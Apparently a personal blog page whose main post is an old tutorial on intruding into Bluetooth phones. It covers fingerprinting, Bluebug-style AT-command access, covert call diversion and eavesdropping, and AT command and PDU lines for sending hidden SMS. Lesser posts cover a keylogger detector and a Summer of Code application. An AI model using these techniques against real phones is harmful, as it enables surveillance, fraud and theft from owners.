Did she fire the crypto ?

well, now Jul

Bluetooth Intrusion: How it works

A tutorial I wrote a long time back for neworder group The fundamentals of Bluetooth Security still remain same. Read on

This manual aims at enabling all people know the Pandora’s box in their very own pocket and know how it works! Mobile Phone Bluetooth enabled

Bluetooth, as we all know is a method for wirelessly transmitting the data over networks. Nowadays, it’s more seen in mobile phones. In India after the Cell phone revolution almost all people are now switching over to Bluetooth enabled cell phones to make their lives easier by allowing free transmission of data in a comfortable range and gaming etc. to the owner.

It is relatively better than Infrared (the one in your TV remote), operates on low power, and is a low cost technology with no usage charges. So no reason that it won’T be popular!

However in the mind of a hacker the ways to intrude keep germinating. As I said nothing is unbreakable! Bluetooth too. So before this cranky lecture gets over your nerves, I start the real thing.

It has been found that the complete memory contents of some mobile phones can be accessed by a previously trusted (”paired”) device that has since been removed from the trusted list. This data includes not only the phonebook and calendar, but media files such as pictures and text messages. In essence, the entire device can be “backed up” to an attacker’s own system.

A good attacker generally creates a serial profile connection to the device, for obtaining full access to the AT command set( the same commands that connect your modem the internet although different for BT phones), which can then be exploited using tools freely available online, such as PPP for networking and messaging, contact management(deletion and addition), diverts and initiating calls, connect to data services such as the Internet through GPRS, and even monitor conversations in the vicinity of the phone. This latter is done via a voice call over the GSM network, so the attacker can be anywhere in the world. Bluetooth access is only required for a few seconds in order to set up the call. Call forwarding diverts can be set up, making the innocent owner’s incoming calls to be intercepted, either to provide a channel for calls to more expensive destinations, or for identity theft by impersonation of the victim. Hackers are getting smart. So should be you

************************
The Indian context
************************
He can even use that for transferring the balance on his cash card by transferring it from yours! (This is the exploit I discovered recently in the biggest GSM company in India while I was playing around with Bluetooth)
Sounds scary!
It is!
Bluetooth devices are classified among three classes
Class 1 – Range=high, up to 100 meters
Class 2 – Range=Medium, up to 10 meters
Class 3 – Range =low, very much within 10

We are dealing with Class 2 and 3 devices.
Every Bluetooth-enabled device has some characteristics that are either unique (Bluetooth device address), manufacturer specific (the first part of the Bluetooth device address) or model-specific (service description records).
Bluetooth Device Address
Bluetooth device address is something like IP address, unique for each device set. This address consists out of 6 bytes (looks like MAC addresses MM:MM:MM:XX:XX:XX). This address can also be understood as hardware address that is written in the ROM in the chipset of the device. The first three bytes of this address (the M-bytes in the above notation sample) tell us about the manufacturer of the Device. This is the first step to know about the device’s properties . @stake’s redfang tool does this. Unfortunately, it is not possible to tell upon the number range of the address part of the device address (the X-bytes in the above notation sample) which model it is.
Service Discovery Protocol Records
Each Bluetooth device that accepts communication from other Bluetooth devices announces its offered services through a service discovery protocol (SDP) Its like a profile of the device. So, remote devices can query devices upon the offered capabilities. SDP records are returned to the querying device and hold information on how to access the respective service. My method now hashes certain values from the SDPs and generates a unqiue fingerprint value that is then used to refer to a certain phone model.
Take a look at this SDP
Service Name: OBEX Object Push
Service Handle: 000×10c
Service Class ID list:
“OBEX Object Push (0001cx)
Protocol Descriptor list:
(0×0100)
Channel:9
Version:0×100
/ from Nokia 6310i

Now the attacker will run “Blueprint software and obtain the following result:
00:60:57@2621543
Device: Nokia 6310i
Version: V 5.22 15-11-200x NP
Type: Mobile phone
Note: Vulnerable to Bluebug attack /* A type of attack

How the attack begins!

First step is to scan all the devices in the range of the phone (here I will limit my manual to mobile phones only) after know whom to bluejack/attack the hacker sends him a message using his Bluejack software on the phone.
This is normally only possible if the device is in “discoverable” or “visible” mode, but there are tools available on the Internet that allow even this safety to be bypassed easily.
I have written a program in Perl language for such intrusions. Use it to check your phone’s vulnerability to attacks. I will give you the source later in NH group.

How to send SMS from a hacked phone!
This technique can be used by the attacker to know your mobile phone number by sending SMS to himself. ( now you can think of the consequences, blackmailing etc) .
SMS messages can be sent by using SMS PDUs which are different for each company of the phone.
For Nokia PDU visit the German site www.nobbi.com . The sending of the SMS is not generally visible by the user of the attacked phone. Settings can be made for not generating the delivery reports on the phone. So it makes the sending completely hidden for the hacker

AT commands:

AT+CMGF=0 //Set PDU mode AT+CSMS=0 //Check if modem supports SMS commands AT+CMGS=23 //Send message, 23 octets (excluding the two initial zeros) >0011000B916407281553F80000AA0A

E8329BFD4697D9EC37There are 23 octets in this message (46 ‘characters’). The first octet (”00″) doesn’t count, it is only an indicator of the length of the SMSC information supplied (0). The PDU string consists of the following

In the same way a call can be initiated on the hacked phone using AT commands that are freely available on net.

This is how one can start from the scratch and easily attack anyone in the range having a BT enabled phone.
For newbies and script kiddies I have few assorted tools in .SIS format that will do the needful for them. You can have the full package in the NH files section!
But its’ always advisable to try out the real programming as it turns on the real hacking spirit in you.
That is all for now, hope you liked this manual. Till the next update,I bid a bye!
Anirudh Sharma
anirudhsharma.crypto [at] gmail dot com
Doubts and queries via email or Youth India Forum Hacking Section ( www.youthindiaforum.com)

note: I have used redfang as the reference

An awesome strategy to catch keyloggers.

A day back i was looking for a tool that could help me login from public computers without the fear of getting keylogged by keyloggers. I was quite paranoid about logging into my account from public computers. Passwords once keylogged can easily be misused- all cryptographic algorithms rendered useless at once .

While googling i got a link to this free tool called KL-Detector.It uses a smarter algorithms than most antivirus softwares to catch hold of the running trojans/keyloggers.

1. A keylogger will record anything and everything typed from the keyboard to a file on the local harddisk.

2. The size of data typed from computer keyboard= size data being added to the log file

3. This tool looks for this “increment” in log file’s size. The size is compared to what is typed in realtime from the keyboard.

4. If the increment matches for a definite period of time then the probability is high that you’re being snooped by a keylogger The process can then be ended and keylogging can be stopped.

Now this is much smarter than a usual antivirus which relies on the updated signatures from the antivirus definition database , and you’ll like it when you find it works with every keylogger. I did.

You may download your copy here

-anirudh

My G00gle Summ3r of C0d3 application ;)

Finally I am ready to submit my ~NUI Google SOC application.

Plan to go out for a beer and ride today to reboot myself to get back to the coding groove

GSoC application for NUI group

Anirudh Sharma

Summer of code :) NUI ~

Summer of code is great. Its keeping me on toes , keeping me busy, i don’t feel tired .

Community interaction at forums is great, a lot of people encourage, some criticize , which overall helps in improving the idea.

I am a student from India. I think its somewhat a more effort for students here. Open source is still not very popular here, people like sticking to the good old Micro$oft.

Timezone difference is a big problem. Communication on IRC has to take place at night, thats ok. But my college attendence gets badly affected by this

Working with Natural User Interface presently. I am excited to do a lot of hardware and code hacking soon right now drafting the proposal for Summer of Code is the priority.

Proposed something also on the Nmap Security scanner mailing lists. Lets see what Fyodor and people say to it .

-anirudh sharma

What is grey hat india

looking through the keyhole,

just another blog,some random ways to get in,

finding the key,

moving on, moving in

obfuscating steps, cleaning the marks

that’s how we do it, that’s how we’ve planned it

to go beyond the password, here’s my hack!

my first post, maybe i’ll get more discplined tommorrow

-a